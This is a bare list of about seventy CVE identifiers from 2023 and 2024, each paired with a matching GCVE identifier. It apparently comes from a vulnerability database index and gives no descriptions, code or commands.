CVE-2024-35825 (GCVE-0-2024-35825)

CVE-2024-38634 (GCVE-0-2024-38634)

CVE-2024-41097 (GCVE-0-2024-41097)

CVE-2024-36960 (GCVE-0-2024-36960)

CVE-2024-39490 (GCVE-0-2024-39490)

CVE-2024-38590 (GCVE-0-2024-38590)

CVE-2024-42119 (GCVE-0-2024-42119)

CVE-2024-39465 (GCVE-0-2024-39465)

CVE-2024-38384 (GCVE-0-2024-38384)

CVE-2024-36286 (GCVE-0-2024-36286)

CVE-2024-35879 (GCVE-0-2024-35879)

CVE-2024-35796 (GCVE-0-2024-35796)

CVE-2024-42077 (GCVE-0-2024-42077)

CVE-2024-35910 (GCVE-0-2024-35910)

CVE-2023-52752 (GCVE-0-2023-52752)

CVE-2024-36889 (GCVE-0-2024-36889)

CVE-2024-38659 (GCVE-0-2024-38659)

CVE-2024-42121 (GCVE-0-2024-42121)

CVE-2024-39483 (GCVE-0-2024-39483)

CVE-2024-41000 (GCVE-0-2024-41000)

CVE-2024-35805 (GCVE-0-2024-35805)

CVE-2024-36005 (GCVE-0-2024-36005)

CVE-2024-35898 (GCVE-0-2024-35898)

CVE-2024-40925 (GCVE-0-2024-40925)

CVE-2024-40922 (GCVE-0-2024-40922)

CVE-2024-33621 (GCVE-0-2024-33621)

CVE-2024-34777 (GCVE-0-2024-34777)

CVE-2024-35885 (GCVE-0-2024-35885)

CVE-2024-39492 (GCVE-0-2024-39492)

CVE-2024-26687 (GCVE-0-2024-26687)

CVE-2024-26629 (GCVE-0-2024-26629)

CVE-2024-41055 (GCVE-0-2024-41055)

CVE-2024-40974 (GCVE-0-2024-40974)

CVE-2024-39296 (GCVE-0-2024-39296)

CVE-2024-42102 (GCVE-0-2024-42102)

CVE-2024-39499 (GCVE-0-2024-39499)

CVE-2024-36940 (GCVE-0-2024-36940)

CVE-2024-37356 (GCVE-0-2024-37356)

CVE-2024-36978 (GCVE-0-2024-36978)

CVE-2024-36894 (GCVE-0-2024-36894)

CVE-2024-36954 (GCVE-0-2024-36954)

CVE-2024-36928 (GCVE-0-2024-36928)

CVE-2024-40945 (GCVE-0-2024-40945)

CVE-2024-36964 (GCVE-0-2024-36964)

CVE-2024-36969 (GCVE-0-2024-36969)

CVE-2024-36950 (GCVE-0-2024-36950)

CVE-2024-39497 (GCVE-0-2024-39497)

CVE-2024-36941 (GCVE-0-2024-36941)

CVE-2024-42105 (GCVE-0-2024-42105)

CVE-2024-39292 (GCVE-0-2024-39292)

CVE-2024-40981 (GCVE-0-2024-40981)

CVE-2023-52760 (GCVE-0-2023-52760)

CVE-2024-39495 (GCVE-0-2024-39495)

CVE-2024-42137 (GCVE-0-2024-42137)

CVE-2024-36029 (GCVE-0-2024-36029)

CVE-2024-40957 (GCVE-0-2024-40957)

CVE-2024-40908 (GCVE-0-2024-40908)

CVE-2024-40965 (GCVE-0-2024-40965)

CVE-2024-36965 (GCVE-0-2024-36965)

CVE-2024-42157 (GCVE-0-2024-42157)

CVE-2024-40951 (GCVE-0-2024-40951)

CVE-2024-40989 (GCVE-0-2024-40989)

CVE-2024-40968 (GCVE-0-2024-40968)

CVE-2024-38625 (GCVE-0-2024-38625)

CVE-2024-39473 (GCVE-0-2024-39473)

CVE-2024-40932 (GCVE-0-2024-40932)

CVE-2024-26810 (GCVE-0-2024-26810)

CVE-2024-36916 (GCVE-0-2024-36916)

CVE-2024-26817 (GCVE-0-2024-26817)

CVE-2024-39468 (GCVE-0-2024-39468)

CVE-2024-36489 (GCVE-0-2024-36489)